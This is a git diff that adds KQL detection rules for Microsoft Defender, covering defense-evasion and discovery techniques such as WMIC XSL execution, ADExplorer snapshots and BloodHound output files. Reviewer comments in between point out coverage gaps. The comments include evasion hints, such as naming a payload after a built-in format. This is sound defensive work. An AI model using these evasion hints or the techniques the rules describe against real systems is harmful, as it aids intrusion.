+| where FolderPath endswith "\\kd.exe" or ProcessVersionInfoOriginalFileName =~ "kd.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/windows_processes_suspicious_parent_directory.kql b/KQL/rules/Defense Evasion/windows_processes_suspicious_parent_directory.kql
new file mode 100644
index 00000000..8edbb364
--- /dev/null
+++ b/KQL/rules/Defense Evasion/windows_processes_suspicious_parent_directory.kql
@@ -0,0 +1,12 @@
+// Title: Windows Processes Suspicious Parent Directory
+// Author: vburov
+// Date: 2019-02-23
+// Level: low
+// Description: Detect suspicious parent processes of well-known Windows processes
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003, attack.t1036.005
+// False Positives:
+// - Some security products seem to spawn these
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\lsaiso.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe") and (not((((InitiatingProcessFolderPath contains "\\Windows Defender\\" or InitiatingProcessFolderPath contains "\\Microsoft Security Client\\") and InitiatingProcessFolderPath endswith "\\MsMpEng.exe") or (isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath in~ ("", "-"))) or ((InitiatingProcessFolderPath endswith "\\SavService.exe" or InitiatingProcessFolderPath endswith "\\ngen.exe") or (InitiatingProcessFolderPath contains "\\System32\\" or InitiatingProcessFolderPath contains "\\SysWOW64\\")))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/winget_admin_settings_modification.kql b/KQL/rules/Defense Evasion/winget_admin_settings_modification.kql
new file mode 100644
index 00000000..f5e81a55
--- /dev/null
+++ b/KQL/rules/Defense Evasion/winget_admin_settings_modification.kql
@@ -0,0 +1,12 @@
+// Title: Winget Admin Settings Modification
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-17
+// Level: low
+// Description: Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence
+// False Positives:
+// - The event doesn't contain information about the type of change. False positives are expected with legitimate changes
+
+DeviceRegistryEvents
+| where InitiatingProcessFolderPath endswith "\\winget.exe" and RegistryKey endswith "\\LocalState\\admin_settings" and RegistryKey =~ "\\REGISTRY\\A*"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql b/KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql
new file mode 100644
index 00000000..3ee057af
--- /dev/null
+++ b/KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql
@@ -0,0 +1,12 @@
+// Title: Wlrmdr.EXE Uncommon Argument Or Child Process
+// Author: frack113, manasmbellani
+// Date: 2022-02-16
+// Level: medium
+// Description: Detects the execution of "Wlrmdr.exe" with the "-u" command line flag which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries.
+This detection also focuses on any uncommon child processes spawned from "Wlrmdr.exe" as a supplement for those that posses "ParentImage" telemetry.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\wlrmdr.exe" or (((ProcessCommandLine contains "-a " or ProcessCommandLine contains "/a " or ProcessCommandLine contains "–a " or ProcessCommandLine contains "—a " or ProcessCommandLine contains "―a ") and (ProcessCommandLine contains "-f " or ProcessCommandLine contains "/f " or ProcessCommandLine contains "–f " or ProcessCommandLine contains "—f " or ProcessCommandLine contains "―f ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "/m " or ProcessCommandLine contains "–m " or ProcessCommandLine contains "—m " or ProcessCommandLine contains "―m ") and (ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s " or ProcessCommandLine contains "–s " or ProcessCommandLine contains "—s " or ProcessCommandLine contains "―s ") and (ProcessCommandLine contains "-t " or ProcessCommandLine contains "/t " or ProcessCommandLine contains "–t " or ProcessCommandLine contains "—t " or ProcessCommandLine contains "―t ") and (ProcessCommandLine contains "-u " or ProcessCommandLine contains "/u " or ProcessCommandLine contains "–u " or ProcessCommandLine contains "—u " or ProcessCommandLine contains "―u ") and (FolderPath endswith "\\wlrmdr.exe" or ProcessVersionInfoOriginalFileName =~ "WLRMNDR.EXE")) and (not(((InitiatingProcessFolderPath in~ ("", "-")) or 
isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\winlogon.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/wmic_loading_scripting_libraries.kql b/KQL/rules/Defense Evasion/wmic_loading_scripting_libraries.kql
new file mode 100644
index 00000000..45ad31ac
--- /dev/null
+++ b/KQL/rules/Defense Evasion/wmic_loading_scripting_libraries.kql
@@ -0,0 +1,14 @@
+// Title: WMIC Loading Scripting Libraries
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-17
+// Level: medium
+// Description: Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1220
+// False Positives:
+// - The command wmic os get lastboottuptime loads vbscript.dll
+// - The command wmic os get locale loads vbscript.dll
+// - Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\jscript.dll" or FolderPath endswith "\\vbscript.dll") and InitiatingProcessFolderPath endswith "\\wmic.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql b/KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql
new file mode 100644
index 00000000..8b9c5f90
--- /dev/null
+++ b/KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql
@@ -0,0 +1,12 @@
+// Title: Write Protect For Storage Disabled
+// Author: Sreeman
+// Date: 2021-06-11
+// Level: medium
+// Description: Detects applications trying to modify the registry in order to disable any write-protect property for storage devices.
+This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control" and ProcessCommandLine contains "Write Protection" and ProcessCommandLine contains "0" and ProcessCommandLine contains "storage"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/writing_of_malicious_files_to_the_fonts_folder.kql b/KQL/rules/Defense Evasion/writing_of_malicious_files_to_the_fonts_folder.kql
new file mode 100644
index 00000000..998683c9
--- /dev/null
+++ b/KQL/rules/Defense Evasion/writing_of_malicious_files_to_the_fonts_folder.kql
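Review bot: `ProcessCommandLine contains "0"` is satisfied by almost any command line that contains a digit, and `"Write Protection"` (with a space) does not match the value actually used for this control, which to my knowledge is `WriteProtect` under `HKLM\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies` — so a plain `reg add ... /v WriteProtect /t REG_DWORD /d 0` is missed while the rule keeps the upstream string set verbatim. Since this port targets MDE, the registry table is the more reliable source: `DeviceRegistryEvents | where RegistryKey endswith "\\StorageDevicePolicies" and RegistryValueName =~ "WriteProtect" and RegistryValueData == "0"`. If the process-creation form is kept as a fallback, at least replace the `"Write Protection"` term with `ProcessCommandLine has_any ("WriteProtect", "Write Protection")` so both spellings are covered, and say in the header which spelling the rule was originally written against.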
@@ -0,0 +1,10 @@
+// Title: Writing Of Malicious Files To The Fonts Folder
+// Author: Sreeman
+// Date: 2020-04-21
+// Level: medium
+// Description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1211, attack.t1059, attack.defense-evasion, attack.persistence, attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "echo" or ProcessCommandLine contains "copy" or ProcessCommandLine contains "type" or ProcessCommandLine contains "file createnew" or ProcessCommandLine contains "cacls") and ProcessCommandLine contains "C:\\Windows\\Fonts\\" and (ProcessCommandLine contains ".sh" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bin" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".msh" or ProcessCommandLine contains ".reg" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".jar" or ProcessCommandLine contains ".pl" or ProcessCommandLine contains ".inf" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".msi" or ProcessCommandLine contains ".vbs")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/wsl_kali_linux_usage.kql b/KQL/rules/Defense Evasion/wsl_kali_linux_usage.kql
new file mode 100644
index 00000000..97d8461a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/wsl_kali_linux_usage.kql
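Review bot: The path term `ProcessCommandLine contains "C:\\Windows\\Fonts\\"` hard-codes both the drive letter and the literal path, so a write expressed as `%windir%\Fonts\`, `%SystemRoot%\Fonts\`, or on a host whose system drive is not C: never matches; `ProcessCommandLine has_any (":\\Windows\\Fonts\\", "%windir%\\Fonts\\", "%SystemRoot%\\Fonts\\")` keeps the intent and closes the obvious variants. The verb list (`echo`, `copy`, `type`) is very loose on its own but stays bounded by the conjunction with the Fonts path, so I would leave it. It is worth a header comment that these are cmd.exe built-ins, so the rule only sees them when they appear in a spawned `cmd /c ...` command line — commands typed into an already running shell produce no process-creation event and are invisible to it.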
@@ -0,0 +1,12 @@
+// Title: WSL Kali-Linux Usage
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-10
+// Level: high
+// Description: Detects the use of Kali Linux through Windows Subsystem for Linux
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+// False Positives:
+// - Legitimate installation or usage of Kali Linux WSL by administrators or security teams
+
+DeviceProcessEvents
+| where (((FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\packages\\KaliLinux") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\kali.exe")) or (FolderPath contains ":\\Program Files\\WindowsApps\\KaliLinux." and FolderPath endswith "\\kali.exe")) or ((((FolderPath contains "\\kali.exe" or FolderPath contains "\\KaliLinux") or (ProcessCommandLine contains "Kali.exe" or ProcessCommandLine contains "Kali-linux" or ProcessCommandLine contains "kalilinux")) and (InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wslhost.exe")) and (not((ProcessCommandLine contains " -i " or ProcessCommandLine contains " --install " or ProcessCommandLine contains " --unregister "))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql b/KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql
new file mode 100644
index 00000000..7807774f
--- /dev/null
+++ b/KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql
@@ -0,0 +1,13 @@
+// Title: XBAP Execution From Uncommon Locations Via PresentationHost.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-01
+// Level: medium
+// Description: Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+// False Positives:
+// - Legitimate ".xbap" being executed via "PresentationHost"
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".xbap" and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe")) and (not((ProcessCommandLine contains " C:\\Windows\\" or ProcessCommandLine contains " C:\\Program Files")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql b/KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql
new file mode 100644
index 00000000..9b3691dc
--- /dev/null
+++ b/KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql
@@ -0,0 +1,16 @@
+// Title: XSL Script Execution Via WMIC.EXE
+// Author: Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel
+// Date: 2019-10-21
+// Level: medium
+// Description: Detects the execution of WMIC with the "format" flag to potentially load XSL files.
+Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
+Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1220
+// False Positives:
+// - WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.
+// - Static format arguments - https://petri.com/command-line-wmi-part-3
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-format" or ProcessCommandLine contains "/format" or ProcessCommandLine contains "–format" or ProcessCommandLine contains "—format" or ProcessCommandLine contains "―format") and FolderPath endswith "\\wmic.exe") and (not((ProcessCommandLine contains "Format:List" or ProcessCommandLine contains "Format:htable" or ProcessCommandLine contains "Format:hform" or ProcessCommandLine contains "Format:table" or ProcessCommandLine contains "Format:mof" or ProcessCommandLine contains "Format:value" or ProcessCommandLine contains "Format:rawxml" or ProcessCommandLine contains "Format:xml" or ProcessCommandLine contains "Format:csv")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/active_directory_database_snapshot_via_adexplorer.kql b/KQL/rules/Discovery/active_directory_database_snapshot_via_adexplorer.kql
new file mode 100644
index 00000000..f09e0895
--- /dev/null
+++ b/KQL/rules/Discovery/active_directory_database_snapshot_via_adexplorer.kql
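Review bot: The exclusion is built from substring matches (`contains "Format:List"`, `contains "Format:csv"`, ...), so a payload named after a built-in format — `wmic ... /format:list.xsl` or `/format:csv.xsl` — is suppressed by the very filter meant to drop benign output formatting. Anchoring the exclusion to the end of the token closes that: `| where not(ProcessCommandLine matches regex @'(?i)format:"?(list|htable|hform|table|mof|value|rawxml|xml|csv)"?(\s|$)')`. The positive match `contains "-format"` is broad enough that `/format:list` itself reaches the exclusion, which is fine, but a one-line header comment that the exclusion is a known evasion surface and that any `/format:` argument pointing to a path or URL should be treated as a hit would help whoever tunes this next.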
@@ -0,0 +1,10 @@
+// Title: Active Directory Database Snapshot Via ADExplorer
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-14
+// Level: medium
+// Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.002, attack.t1069.002, attack.t1482
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "snapshot" and ((FolderPath endswith "\\ADExp.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADExplorer64a.exe") or ProcessVersionInfoOriginalFileName =~ "AdExp" or ProcessVersionInfoFileDescription =~ "Active Directory Editor" or ProcessVersionInfoProductName =~ "Sysinternals ADExplorer")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql b/KQL/rules/Discovery/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql
new file mode 100644
index 00000000..72ac1e7b
--- /dev/null
+++ b/KQL/rules/Discovery/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql
@@ -0,0 +1,12 @@
+// Title: ADExplorer Writing Complete AD Snapshot Into .dat File
+// Author: Arnim Rupp (Nextron Systems), Thomas Patzke
+// Date: 2025-07-09
+// Level: medium
+// Description: Detects the dual use tool ADExplorer writing a complete AD snapshot into a .dat file. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.002, attack.t1069.002, attack.t1482
+// False Positives:
+// - Legitimate use of ADExplorer by administrators creating .dat snapshots
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\ADExp.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64a.exe") and FolderPath endswith ".dat"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/advanced_ip_scanner_file_event.kql b/KQL/rules/Discovery/advanced_ip_scanner_file_event.kql
new file mode 100644
index 00000000..66ee8f06
--- /dev/null
+++ b/KQL/rules/Discovery/advanced_ip_scanner_file_event.kql
@@ -0,0 +1,12 @@
+// Title: Advanced IP Scanner - File Event
+// Author: @ROxPinTeddy
+// Date: 2020-05-12
+// Level: medium
+// Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046
+// False Positives:
+// - Legitimate administrative use
+
+DeviceFileEvents
+| where FolderPath contains "\\AppData\\Local\\Temp\\Advanced IP Scanner 2"
\ No newline at end of file
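Review bot: The query has no `ActionType` constraint, so any `.dat` activity attributed to ADExplorer — renames, deletes, modifications — fires, not only the snapshot write the title describes; `| where ActionType == "FileCreated"` (or `ActionType in ("FileCreated", "FileModified")` if snapshots turn out to be written incrementally) narrows it to the event the rule is about. Matching the extension with `FileName endswith ".dat"` rather than on `FolderPath` is also safer: in DeviceFileEvents `FolderPath` normally carries the full path including the file name, but if a tenant ever reports only the directory the current `endswith ".dat"` test silently never matches. The same missing `ActionType` filter applies to the Advanced IP Scanner file-event rule added right after this one.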
diff --git a/KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql b/KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql
new file mode 100644
index 00000000..8fcbe710
--- /dev/null
+++ b/KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql
@@ -0,0 +1,12 @@
+// Title: Azure AD Health Monitoring Agent Registry Keys Access
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+// Date: 2021-08-26
+// Level: medium
+// Description: This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.
+This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1012
+
+DeviceRegistryEvents
+| where RegistryKey =~ "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent" and (not((InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.InsightsService.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.PshSurrogate.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql b/KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql
new file mode 100644
index 00000000..2174de59
--- /dev/null
+++ b/KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql
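Review bot: `RegistryKey =~ "\\REGISTRY\\MACHINE\\SOFTWARE\\..."` compares against the NT object-manager path that Windows Security and Sysmon emit, but advanced hunting renders keys as `HKEY_LOCAL_MACHINE\SOFTWARE\...`, so as far as I can tell this exact match will never be true in MDE. There is a second gap in the data source itself: DeviceRegistryEvents records key and value creation, modification, rename and deletion, not read access, so the SACL-based "access attempt" detection the description promises (Security event 4663) has no equivalent here and the ported rule can only catch modifications. I would change the predicate to `RegistryKey =~ @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent"` and add a header line such as `// NOTE: MDE only records registry writes; read-access auditing of this key still requires the Windows Security (4663) source.`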
@@ -0,0 +1,14 @@
+// Title: Azure AD Health Service Agents Registry Keys Access
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+// Date: 2021-08-26
+// Level: medium
+// Description: This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).
+Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).
+This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent.
+Make sure you set the SACL to propagate to its sub-keys.
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1012
+
+DeviceRegistryEvents
+| where RegistryKey =~ "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\ADHealthAgent" and (not((InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.InsightsService.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.PshSurrogate.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/bloodhound_collection_files.kql b/KQL/rules/Discovery/bloodhound_collection_files.kql
new file mode 100644
index 00000000..3a14b15a
--- /dev/null
+++ b/KQL/rules/Discovery/bloodhound_collection_files.kql
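Review bot: The description says the SACL must propagate to sub-keys, but the predicate `RegistryKey =~ "...\\ADHealthAgent"` exact-matches only the parent key, so activity on `ADHealthAgent\<subkey>` is never seen; `RegistryKey startswith @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ADHealthAgent"` covers the tree. That rewrite also fixes the prefix, because advanced hunting reports keys in the `HKEY_LOCAL_MACHINE\...` form rather than the NT path `\REGISTRY\MACHINE\...`, which I would not expect MDE to emit at all. Note too that DeviceRegistryEvents only carries write-type operations, so the header should state that this detects modification of the agent's keys and not the read access the upstream Security-event rule was written for.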
@@ -0,0 +1,12 @@
+// Title: BloodHound Collection Files
+// Author: C.J. May
+// Date: 2022-08-09
+// Level: high
+// Description: Detects default file names outputted by the BloodHound collection tool SharpHound
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.001, attack.t1087.002, attack.t1482, attack.t1069.001, attack.t1069.002, attack.execution, attack.t1059.001
+// False Positives:
+// - Some false positives may arise in some environment and this may require some tuning. Add additional filters or reduce level depending on the level of noise
+
+DeviceFileEvents
+| where (FolderPath endswith "BloodHound.zip" or FolderPath endswith "_computers.json" or FolderPath endswith "_containers.json" or FolderPath endswith "_domains.json" or FolderPath endswith "_gpos.json" or FolderPath endswith "_groups.json" or FolderPath endswith "_ous.json" or FolderPath endswith "_users.json") and (not((InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath endswith "\\pocket_containers.json" and FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/capabilities_discovery_linux.kql b/KQL/rules/Discovery/capabilities_discovery_linux.kql
new file mode 100644
index 00000000..32b05ec8
--- /dev/null
+++ b/KQL/rules/Discovery/capabilities_discovery_linux.kql
@@ -0,0 +1,10 @@
+// Title: Capabilities Discovery - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-28
+// Level: low
+// Description: Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -r " or ProcessCommandLine contains " /r " or ProcessCommandLine contains " –r " or ProcessCommandLine contains " —r " or ProcessCommandLine contains " ―r ") and FolderPath endswith "/getcap"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql b/KQL/rules/Discovery/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql
new file mode 100644
index 00000000..c7b93053
--- /dev/null
+++ b/KQL/rules/Discovery/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql
@@ -0,0 +1,12 @@
+// Title: Computer Discovery And Export Via Get-ADComputer Cmdlet
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-11-10
+// Level: medium
+// Description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033
+// False Positives:
+// - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " > " or ProcessCommandLine contains " | Select " or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "Set-Content" or ProcessCommandLine contains "Add-Content") and (ProcessCommandLine contains "Get-ADComputer " and ProcessCommandLine contains " -Filter *")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/computer_system_reconnaissance_via_wmic_exe.kql b/KQL/rules/Discovery/computer_system_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..76de5d85
--- /dev/null
+++ b/KQL/rules/Discovery/computer_system_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Computer System Reconnaissance Via Wmic.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-08
+// Level: medium
+// Description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "computersystem" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/console_codepage_lookup_via_chcp.kql b/KQL/rules/Discovery/console_codepage_lookup_via_chcp.kql
new file mode 100644
index 00000000..25950e0e
--- /dev/null
+++ b/KQL/rules/Discovery/console_codepage_lookup_via_chcp.kql
@@ -0,0 +1,13 @@
+// Title: Console CodePage Lookup Via CHCP
+// Author: _pete_0, TheDFIRReport
+// Date: 2022-02-21
+// Level: medium
+// Description: Detects use of chcp to look up the system locale value as part of host discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1614.001
+// False Positives:
+// - During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command.
+// - Discord was seen using chcp to look up code pages
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "chcp" or ProcessCommandLine endswith "chcp " or ProcessCommandLine endswith "chcp ") and FolderPath endswith "\\chcp.com" and (InitiatingProcessCommandLine contains " -c " or InitiatingProcessCommandLine contains " /c " or InitiatingProcessCommandLine contains " –c " or InitiatingProcessCommandLine contains " —c " or InitiatingProcessCommandLine contains " ―c " or InitiatingProcessCommandLine contains " -r " or InitiatingProcessCommandLine contains " /r " or InitiatingProcessCommandLine contains " –r " or InitiatingProcessCommandLine contains " —r " or InitiatingProcessCommandLine contains " ―r " or InitiatingProcessCommandLine contains " -k " or InitiatingProcessCommandLine contains " /k " or InitiatingProcessCommandLine contains " –k " or InitiatingProcessCommandLine contains " —k " or InitiatingProcessCommandLine contains " ―k ") and InitiatingProcessFolderPath endswith "\\cmd.exe"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/container_residence_discovery_via_proc_virtual_fs.kql b/KQL/rules/Discovery/container_residence_discovery_via_proc_virtual_fs.kql
new file mode 100644
index 00000000..3a44de69
--- /dev/null
+++ b/KQL/rules/Discovery/container_residence_discovery_via_proc_virtual_fs.kql
@@ -0,0 +1,13 @@
+// Title: Container Residence Discovery Via Proc Virtual FS
+// Author: Seth Hanford
+// Date: 2023-08-23
+// Level: low
+// Description: Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+// - Legitimate system administrator usage of these commands
+// - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered
+
+DeviceProcessEvents
+| where (FolderPath endswith "awk" or FolderPath endswith "/cat" or FolderPath endswith "grep" or FolderPath endswith "/head" or FolderPath endswith "/less" or FolderPath endswith "/more" or FolderPath endswith "/nl" or FolderPath endswith "/tail") and (ProcessCommandLine contains "/proc/2/" or (ProcessCommandLine contains "/proc/" and (ProcessCommandLine endswith "/cgroup" or ProcessCommandLine endswith "/sched")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/crontab_enumeration.kql b/KQL/rules/Discovery/crontab_enumeration.kql
new file mode 100644
index 00000000..5aa3bfde
--- /dev/null
+++ b/KQL/rules/Discovery/crontab_enumeration.kql
@@ -0,0 +1,12 @@
+// Title: Crontab Enumeration
